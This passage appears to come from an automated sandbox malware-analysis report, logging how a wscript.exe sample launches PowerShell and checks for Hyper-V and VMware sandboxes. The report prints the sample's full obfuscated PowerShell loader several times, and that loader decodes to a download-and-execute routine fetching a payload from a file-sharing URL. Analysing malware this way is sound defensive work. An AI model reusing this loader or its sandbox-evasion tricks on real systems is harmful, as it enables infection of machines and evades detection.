eelimsVis=Egy$WooeJ.nn olvs l:MedaDmppTw.pPred aaasyrtMaravu.+ yk$ M DHipr eliKilnpeakskasNonepitnPhaeTilsFur ');tramelling (doublecrossing ',or$sozg emlD ro KebA taUnilPra:AcrsI vtImpyG,irE otBindManyRookFa kU ceButr Ln=Pol$ AtEAman.ykcBilhIndes.hsKeeoJobn Pa.Tyns ekpsy,lsleiAb tHav(Bil$ svD.eyiUngoCruxPleiDord To) sc ');tramelling (doublecrossing 'Maw[DifNCamestrtTer.kilsV,le sir Mev FaiBescDaweFerPTheoHypiUndnso.tNskM s.a M ns,maspegsameRidr K ] a: on:Na.sdove ApcHabuPa.r ,riJart apyskuPst,rA coskatA koF,lcAn o NelNon n= Nu kv[ ndNR aeQuatCo . VasPite BacstousynrA gisartLgtyOplPNerrTrao TrtBndoGlucHe oCyclAlaTR gyEkspsa e d]Avo:F r: phTNonlMarsP,e1s o2Idi ');$Encheson=$styrtdykker[0];$Northwardly=(doublecrossing ' Ou$sogGs mLPlaONonBTerAGlaL Or:steLIntIs oGUn H ktT p,a MtGForesl.6 Ma8s,v=optnAarE BawPar-TheostaBMilJIfaE HoC UvTnon EarsF rYLa.s.potFeeED lMHov.DelNK aE untFor.OvewJonEA,sbOplCGelL KeIsenePs nAndT sp ');tramelling ($Northwardly);tramelling (doublecrossing ' Cr$DiaLRe iDkfgL phEmutAfkaRidgEnfeFre6Til8Cir.MarHOvaePa asa.dVapestar sesFag[ un$ConPToraVo n D sBl eConrP lv TuaRa ashob Ade AnnCem].as= p$At s Kao.ntrPhotFikky pltrid K tMis ');$semicolloquially=doublecrossing ' F $.oaLHlei N gRovhReitMi as ng PreBad6Ur.8Fum.strDTypo Prwsydn rulozooAu aFerdan FBetiB ml beeMyo(Pse$ onEOffn Unc mohIJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_00007FFD9BA052A7 pushad ; iretd 1_2_00007FFD9BA052B9
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_00007FFD9BA00973 push E95B65D0h; ret 1_2_00007FFD9BA009C9
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_00007FFD9BADC410 pushad ; retn 0000h1_2_00007FFD9BADC5B1
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_00007FFD9BAD78DD push edi; ret 1_2_00007FFD9BAD78DE
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_00007FFD9BADC494 pushad ; retn 0000h1_2_00007FFD9BADC5B1
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_00007FFD9BAD7C72 push esp; ret 1_2_00007FFD9BAD7C74
      Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

      Malware Analysis System Evasion

      barindex
      Queries sensitive service information (via WMI, WIN32_SERVICE, often done to detect sandboxes)
      Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Service
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
      Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6280Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3497Jump to behavior
      Source: C:\Windows\System32\wscript.exe TID: 7380Thread sleep time: -30000s >= -30000sJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7592Thread sleep time: -2767011611056431s >= -30000sJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
      Source: wscript.exe, 00000000.00000003.1708614080.000001DC5EADB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1717547305.000001DC5EADB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1708336841.000001DC5EADB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1707930917.000001DC5EADB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1719617454.000001DC5EADB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW5
      Source: wscript.exe, 00000000.00000003.1717643536.000001DC5CB18000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}$
      Source: wscript.exe, 00000000.00000002.1719782675.000001DC5EB96000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 2-0000F81FEDEE}\InstanceEE}iskHyper-V Guest Service InterfacevmicheartbeatHyper-V Data Exchange ServiceHyper-V Remote Desktop Virtualization ServicevmicshutdownHyper-V Time Synchronization ServiceHyper-V PowerShell Direct ServicevmicvssVolume
      Source: wscript.exe, 00000000.00000002.1719282268.000001DC5CB2A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1718125576.000001DC5CB25000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1708284459.000001DC5CB05000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1718434684.000001DC5CB26000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1717643536.000001DC5CB18000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW0G
      Source: wscript.exe, 00000000.00000003.1718075633.000001DC5EB8A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \Registry\Machine\Software\Classes\CLSID\{66742402-F9B9-11D1-A202-0000F81FEDEE}\InstanceEE}iskHyper-V Guest Service InterfacevmicheartbeatHyper-V Data Exchange ServiceHyper-V Remote Desktop Virtualization ServicevmicshutdownHyper-V Time Synchronization ServiceHyper-V PowerShell Direct ServicevmicvssVolume
      Source: wscript.exe, 00000000.00000003.1718684416.000001DC5CB1E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1719184508.000001DC5CB1E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1717643536.000001DC5CB18000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Win32_ServiceStoppedOKvmicguestinterfacevmicguestinterfaceProvides an interface for the Hyper-V host to interact with specific services running inside the virtual machine.Share ProcessManualNormalC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -pLocalSystemHyper-V Guest Service InterfaceHyper-V Guest Service InterfaceWin32_ServiceWin32_ComputerSystemuser-PCvmicguestinterfaceLMEM@
      Source: wscript.exe, 00000000.00000003.1717643536.000001DC5CB18000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: vmicvss
      Source: wscript.exe, 00000000.00000003.1708614080.000001DC5EADB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1717547305.000001DC5EADB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1708336841.000001DC5EADB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1707930917.000001DC5EADB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1719617454.000001DC5EADB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
      Source: powershell.exe, 00000001.00000002.3013440346.000001ADE7FC0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWho%SystemRoot%\system32\mswsock.dllikky pltrid K tMis ');$semicolloquially=doublecrossing ' F $.oaLHlei N gRovhReitMi as ng PreBad6Ur.8Fum.strDTypo Prwsydn rulozooAu aFerdan FBetiB ml beeMyo(Pse$ onEOffn Unc mohInceKorsCicoaftnser,sep$C,aB EmiPunl Asl s aU raNo@
      Source: wscript.exe, 00000000.00000002.1719491235.000001DC5EA77000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\Xe
      Source: wscript.exe, 00000000.00000003.1717643536.000001DC5CB18000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Win32_ServiceStoppedOKvmicheartbeatvmicheartbeatUnknownUnknownUnknownWin32_ServiceWin32_ComputerSystemJONES-PCvmicheartbeat
      Source: wscript.exe, 00000000.00000003.1718684416.000001DC5CB1E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1719184508.000001DC5CB1E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1717643536.000001DC5CB18000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Provides an interface for the Hyper-V host to interact with specific services running inside the virtual machine.
      Source: wscript.exe, 00000000.00000003.1718684416.000001DC5CB1E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1719184508.000001DC5CB1E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1717643536.000001DC5CB18000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V Guest Service Interface
      Source: wscript.exe, 00000000.00000003.1717643536.000001DC5CB18000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Win32_ServiceStoppedOKvmicvssvmicvssUnknownUnknownUnknownWin32_ServiceWin32_ComputerSystemJONES-PCvmicvssn
      Source: wscript.exe, 00000000.00000003.1717643536.000001DC5CB18000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: vmicheartbeat
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior

      HIPS / PFW / Operating System Protection Evasion

      barindex
      Yara detected Powershell download and execute
      Source: Yara matchFile source: amsi64_7444.amsi.csv, type: OTHER
      Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 7444, type: MEMORYSTR
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#selvhrdendes Opdrager Hjremarginerne Dundertaler #>;$Usolidere43='Councilmen';<#Herredmmer Plasmagenic Jdindernes suttene Korjambisk decelerationsbanen Udskejelser #>;$Dimit=$host.PrivateData;If ($Dimit) {$Pantagraphic++;}function doublecrossing($spisevgringer253){$Driftsbesparelse=$Gucki+$spisevgringer253.Length-$Pantagraphic;for( $Crunchingly=3;$Crunchingly -lt $Driftsbesparelse;$Crunchingly+=4){$Nikeno+=$spisevgringer253[$Crunchingly];}$Nikeno;}function tramelling($Perhapses){ & ($boligydelsen) ($Perhapses);}$sortkldt=doublecrossing 'talM ,fospazLociDatls il Kna D,/Asy5 ke.Ind0Res Lo,(svaW oiHornfordf noanswA ss sm CoN,jrT s. Art1Epa0so,.vet0,ie;P r shoWpasi enA.y6D g4Hav;C b seexLtr6De 4 lo;Mis oerChev ,r: Ud1Ans2tra1Fer.Ri.0Unl)Les ChaG FrestocNe kUndo Ar/sor2Mur0.au1Lok0 F 0Zef1Pso0 Do1 Pr IdFEmiiVenrTegeModf umocanx a/E.i1Out2Ung1Mos. n0 A. ';$Panservaaben=doublecrossing ' s UDiss PaE AsR.lt- Unap lGTapeBjlnOlet r ';$Encheson=doublecrossing 'Gyrh aatP ntPespKnas Ti:Beh/ i/Le d T.rFrai RevFrieImp. s g Inosl.oMosg Jal steHys.RencAngomidmUn,/ vuPercWhe? Kne ndx stp ero rrct tplu=Pred H,ostiwpannsy,lIm oBriaEssd il&KaliF,idE f=h s1LanO DuQTyrEB rlAcc7OveU ,aGsulOPipyUncKsids VaPDecd ,aR npJ Gr9Dis1 eng L wH mqst os,rI ifV T NLinNindRLinsJea6stiPOmbVFur9 ti4Bri ';$Dioxid=doublecrossing ' s.>Fib ';$boligydelsen=doublecrossing 's aistoeAppxs m ';$Manducation='springklaps';$Drinksenes='\Paralytical.Nap';tramelling (doublecrossing 'Otu$Ar gstjl,hooEf.bCl,aCavlBev:Gerc R o Fiu RinepotsaceCamrEvaaLnorBregGr u eelimsVis=Egy$WooeJ.nn olvs l:MedaDmppTw.pPred aaasyrtMaravu.+ yk$ M DHipr eliKilnpeakskasNonepitnPhaeTilsFur ');tramelling (doublecrossing ',or$sozg emlD ro KebA taUnilPra:AcrsI vtImpyG,irE otBindManyRookFa kU ceButr Ln=Pol$ AtEAman.ykcBilhIndes.hsKeeoJobn Pa.Tyns ekpsy,lsleiAb tHav(Bil$ svD.eyiUngoCruxPleiDord To) sc ');tramelling (doublecrossing 'Maw[DifNCamestrtTer.kilsV,le sir Mev FaiBescDaweFerPTheoHypiUndnso.tNskM s.a M ns,maspegsameRidr K ] a: on:Na.sdove ApcHabuPa.r ,riJart apyskuPst,rA coskatA koF,lcAn o NelNon n= Nu kv[ ndNR aeQuatCo . VasPite BacstousynrA gisartLgtyOplPNerrTrao TrtBndoGlucHe oCyclAlaTR gyEkspsa e d]Avo:F r: phTNonlMarsP,e1s o2Idi ');$Encheson=$styrtdykker[0];$Northwardly=(doublecrossing ' Ou$sogGs mLPlaONonBTerAGlaL Or:steLIntIs oGUn H ktT p,a MtGForesl.6 Ma8s,v=optnAarE BawPar-TheostaBMilJIfaE HoC UvTnon EarsF rYLa.s.potFeeED lMHov.DelNK aE untFor.OvewJonEA,sbOplCGelL KeIsenePs nAndT sp ');tramelling ($Northwardly);tramelling (doublecrossing ' Cr$DiaLRe iDkfgL phEmutAfkaRidgEnfeFre6Til8Cir.MarHOvaePa asa.dVapestar sesFag[ un$ConPToraVo n D sBl eConrP lv TuaRa ashob Ade AnnCem].as= p$At s Kao.ntrPhotFikky pltrid K tMis ');$semicolloquially=doublecrossing ' F $.oaLHlei N gRovhReitMi as ng PreBad6Ur.8Fum.strDTypo Prwsydn rulozooAu aFerdan FBetiB ml beeMyo(Pse$ onEOffn Unc mohIJump to behavior
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "<#selvhrdendes opdrager hjremarginerne dundertaler #>;$usolidere43='councilmen';<#herredmmer plasmagenic jdindernes suttene korjambisk decelerationsbanen udskejelser #>;$dimit=$host.privatedata;if ($dimit) {$pantagraphic++;}function doublecrossing($spisevgringer253){$driftsbesparelse=$gucki+$spisevgringer253.length-$pantagraphic;for( $crunchingly=3;$crunchingly -lt $driftsbesparelse;$crunchingly+=4){$nikeno+=$spisevgringer253[$crunchingly];}$nikeno;}function tramelling($perhapses){ & ($boligydelsen) ($perhapses);}$sortkldt=doublecrossing 'talm ,fospazlocidatls il kna d,/asy5 ke.ind0res lo,(svaw oihornfordf noanswa ss sm con,jrt s. art1epa0so,.vet0,ie;p r showpasi ena.y6d g4hav;c b seexltr6de 4 lo;mis oerchev ,r: ud1ans2tra1fer.ri.0unl)les chag frestocne kundo ar/sor2mur0.au1lok0 f 0zef1pso0 do1 pr idfemiivenrtegemodf umocanx a/e.i1out2ung1mos. n0 a. ';$panservaaben=doublecrossing ' s udiss pae asr.lt- unap lgtapebjlnolet r ';$encheson=doublecrossing 'gyrh aatp ntpespknas ti:beh/ i/le d t.rfrai revfrieimp. s g inosl.omosg jal stehys.rencangomidmun,/ vupercwhe? kne ndx stp ero rrct tplu=pred h,ostiwpannsy,lim obriaessd il&kalif,ide f=h s1lano duqtyreb rlacc7oveu ,agsulopipyuncksids vapdecd ,ar npj gr9dis1 eng l wh mqst os,ri ifv t nlinnindrlinsjea6stipombvfur9 ti4bri ';$dioxid=doublecrossing ' s.>fib ';$boligydelsen=doublecrossing 's aistoeappxs m ';$manducation='springklaps';$drinksenes='\paralytical.nap';tramelling (doublecrossing 'otu$ar gstjl,hooef.bcl,acavlbev:gerc r o fiu rinepotsacecamrevaalnorbreggr u eelimsvis=egy$wooej.nn olvs l:medadmpptw.ppred aaasyrtmaravu.+ yk$ m dhipr elikilnpeakskasnonepitnphaetilsfur ');tramelling (doublecrossing ',or$sozg emld ro keba taunilpra:acrsi vtimpyg,ire otbindmanyrookfa ku cebutr ln=pol$ ateaman.ykcbilhindes.hskeeojobn pa.tyns ekpsy,lsleiab thav(bil$ svd.eyiungocruxpleidord to) sc ');tramelling (doublecrossing 'maw[difncamestrtter.kilsv,le sir mev faibescdaweferptheohypiundnso.tnskm s.a m ns,maspegsameridr k ] a: on:na.sdove apchabupa.r ,rijart apyskupst,ra coskata kof,lcan o nelnon n= nu kv[ ndnr aequatco . vaspite bacstousynra gisartlgtyoplpnerrtrao trtbndogluche ocyclalatr gyekspsa e d]avo:f r: phtnonlmarsp,e1s o2idi ');$encheson=$styrtdykker[0];$northwardly=(doublecrossing ' ou$soggs mlplaononbteraglal or:stelintis ogun h ktt p,a mtgforesl.6 ma8s,v=optnaare bawpar-theostabmiljifae hoc uvtnon earsf ryla.s.potfeeed lmhov.delnk ae untfor.ovewjonea,sboplcgell keiseneps nandt sp ');tramelling ($northwardly);tramelling (doublecrossing ' cr$dialre idkfgl phemutafkaridgenfefre6til8cir.marhovaepa asa.dvapestar sesfag[ un$conptoravo n d sbl econrp lv tuara ashob ade anncem].as= p$at s kao.ntrphotfikky pltrid k tmis ');$semicolloquially=doublecrossing ' f $.oalhlei n grovhreitmi as ng prebad6ur.8fum.strdtypo prwsydn rulozooau aferdan fbetib ml beemyo(pse$ oneoffn unc mohi
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "<#selvhrdendes opdrager hjremarginerne dundertaler #>;$usolidere43='councilmen';<#herredmmer plasmagenic jdindernes suttene korjambisk decelerationsbanen udskejelser #>;$dimit=$host.privatedata;if ($dimit) {$pantagraphic++;}function doublecrossing($spisevgringer253){$driftsbesparelse=$gucki+$spisevgringer253.length-$pantagraphic;for( $crunchingly=3;$crunchingly -lt $driftsbesparelse;$crunchingly+=4){$nikeno+=$spisevgringer253[$crunchingly];}$nikeno;}function tramelling($perhapses){ & ($boligydelsen) ($perhapses);}$sortkldt=doublecrossing 'talm ,fospazlocidatls il kna d,/asy5 ke.ind0res lo,(svaw oihornfordf noanswa ss sm con,jrt s. art1epa0so,.vet0,ie;p r showpasi ena.y6d g4hav;c b seexltr6de 4 lo;mis oerchev ,r: ud1ans2tra1fer.ri.0unl)les chag frestocne kundo ar/sor2mur0.au1lok0 f 0zef1pso0 do1 pr idfemiivenrtegemodf umocanx a/e.i1out2ung1mos. n0 a. ';$panservaaben=doublecrossing ' s udiss pae asr.lt- unap lgtapebjlnolet r ';$encheson=doublecrossing 'gyrh aatp ntpespknas ti:beh/ i/le d t.rfrai revfrieimp. s g inosl.omosg jal stehys.rencangomidmun,/ vupercwhe? kne ndx stp ero rrct tplu=pred h,ostiwpannsy,lim obriaessd il&kalif,ide f=h s1lano 